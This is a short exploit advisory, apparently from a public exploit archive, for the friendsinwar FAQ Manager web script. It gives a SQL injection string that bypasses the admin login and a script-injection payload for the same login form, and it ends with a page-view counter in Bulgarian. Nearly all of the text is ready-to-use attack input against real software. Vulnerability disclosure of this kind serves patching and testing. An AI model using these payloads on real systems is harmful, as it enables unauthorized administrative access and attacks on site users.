# Exploit Title: friendsinwar FAQ Manager SQL Injection (authbypass) Vulnerability # Date: 13.10.201 # Exploit Author: d3b4g # Vendor Homepage: http://www.friendsinwar.com # Software Link: http://www.friendsinwar.com/script_demo/the_faq_manager/ # Tested on: Windows 7 # Blog: d3b4g.me ---------------------------------------------------------------------------------- () SQL Injection : http://localhost/path/the_faq_manager/admin/login.php + Use following information to bypass login. User:admin ' or ' 1=1 () Cross Site Scripting: XSS in loging form, insert follwing JS code to loging follwing. '"()&%1<ScRiPt >prompt(952226)</ScRiPt> -end-Брой прочитания на тази страница: 935
friendsinwar FAQ Manager SQL Injection (authbypass) Vulnerability